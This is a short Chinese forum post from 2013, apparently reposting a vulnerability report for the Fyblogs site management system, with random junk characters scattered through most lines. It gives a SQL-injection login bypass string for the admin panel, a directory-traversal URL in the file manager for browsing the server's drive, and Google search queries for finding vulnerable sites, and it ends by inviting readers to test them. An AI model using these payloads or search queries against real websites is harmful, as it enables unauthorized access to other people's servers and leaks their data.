漏洞类型: 未授权访问/权限绕过
" }2 W. K* P* R3 [" S5 v: c
/ _9 u9 R e. H. g6 i+ h3 y简要描述:
& c- y u2 s& ~8 }3 _& M6 A6 y& \6 h" v/ D$ f! T6 O, ]( V4 D7 T
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
% k- R" l6 ^0 z6 W! U
: v$ [+ v9 F& v8 d" G7 \5 f详细说明:
, Y. r+ P1 O* Q T r# W7 Y/ `
; v3 J- l# {7 r Z8 A后台万能密码 'or'='or'7 f9 n. n5 ~' Z- w5 z( L* }
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露! s4 l+ \3 |! K% j' F, r0 \
admin/uploadfile.asp?currentFolder=/upfiles/../0 x C& T5 u1 t& G. _
- K! |, q' |; n2 l2 m: m
漏洞证明:/ ~# o3 s* G- U- u
2 h( E! L2 A+ Z- Z! h
谷歌:inurl:type.asp?id=1 新闻中心/ [. e7 ~% l0 \) o' U9 V! g" R
或者 :inurl:download_ok.asp?6 G9 G2 B1 p( D
& S6 p8 l& w( }9 Z% O3 z可以测试
- v0 s& |) | h3 L. f6 d9 \6 f
9 L0 i3 N$ _ U; I K/ S3 U: h+ H1 F) w$ b
|
发表于 2013-3-7 13:07:46
收藏
支持
反对